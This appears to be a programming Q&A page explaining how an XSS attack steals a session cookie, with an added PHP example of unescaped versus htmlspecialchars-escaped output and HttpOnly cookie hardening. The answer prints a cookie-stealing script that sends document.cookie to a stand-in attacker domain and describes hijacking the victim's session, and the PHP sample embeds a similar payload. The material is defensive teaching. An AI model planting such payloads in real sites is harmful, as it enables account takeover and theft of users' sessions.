How does an XSS attack really work?

Views: 98

Question

So, preventing a website from an XSS attack is very simple: you just need to use the htmlspecialchars function and you are good.
But if the developer forgot to use it, what can an attacker/hacker do? He can get your session_id, right? And here is a question: what can he do with that?
Thank you very much.

Recommended answer

So, preventing a website from an XSS attack is very simple, you just need to use the htmlspecialchars function and you are good.

Right. Use it anywhere you're going to redisplay user-controlled input. This concerns all parts of the HTTP request: headers, body and parameters.

But if the developer forgot to use it, what can an attacker/hacker do?

S/he can insert some malicious HTML/script, e.g. the following in some message/comment on a webpage:

<script>document.write('<img src="http://hackersdomain.com/fake.gif?' + escape(document.cookie) + '" width=0 height=0>');</script>

The above will request an image from the malicious domain, with the document cookie sent along as the query string.

He can get your session_id, right? And here is a question: what can he do with that?

The session ID is stored in a cookie. Once the hacker is notified that an image has been requested with the cookie in the query string, all s/he has to do is edit the browser's cookie to include the same session ID in order to get logged in as the original user. This is obviously very dangerous if the original user is the site admin.
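As an added example (not code from the original question or answer), the PHP below shows the unescaped output the answer warns about next to the htmlspecialchars fix, and the session cookie flags that keep the session ID out of document.cookie even when an escape is missed. The function names and the sample comment are constructed for this example.

```php
<?php
// Added example, not from the original post: vulnerable output next to the
// escaped output, plus cookie flags that stop a script from reading the
// session ID even if an escape is forgotten somewhere.

// Vulnerable: user-controlled input is echoed straight into the HTML,
// so a <script> tag in a comment is parsed and executed by the browser.
function render_comment_unsafe(string $comment): string
{
    return "<div class=\"comment\">$comment</div>";
}

// Fixed: escape for the HTML text context. ENT_QUOTES also escapes single
// quotes, which matters when the value ends up inside an attribute.
function render_comment_safe(string $comment): string
{
    $escaped = htmlspecialchars($comment, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "<div class=\"comment\">$escaped</div>";
}

// Defence in depth: set HttpOnly (and Secure, SameSite) on the session
// cookie before the session starts. With HttpOnly the cookie is still sent
// on requests but is not visible to document.cookie, so the cookie-stealing
// script in the answer gets nothing. Must run before session_start().
function start_hardened_session(): void
{
    session_set_cookie_params([
        'lifetime' => 0,
        'path'     => '/',
        'secure'   => true,   // only sent over HTTPS
        'httponly' => true,   // hidden from JavaScript
        'samesite' => 'Lax',
    ]);
    session_start();
}

// Constructed sample comment, shaped like the payload quoted in the answer.
$comment = "<script>document.write('<img src=\"https://attacker.example/?'"
         . " + document.cookie + '\">')</script>";

echo render_comment_unsafe($comment), PHP_EOL; // script tag emitted verbatim
echo render_comment_safe($comment), PHP_EOL;   // shown as text: &lt;script&gt;...
```

Run it from the command line to compare the two rendered strings; start_hardened_session() is meant to replace a bare session_start() in the web application.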
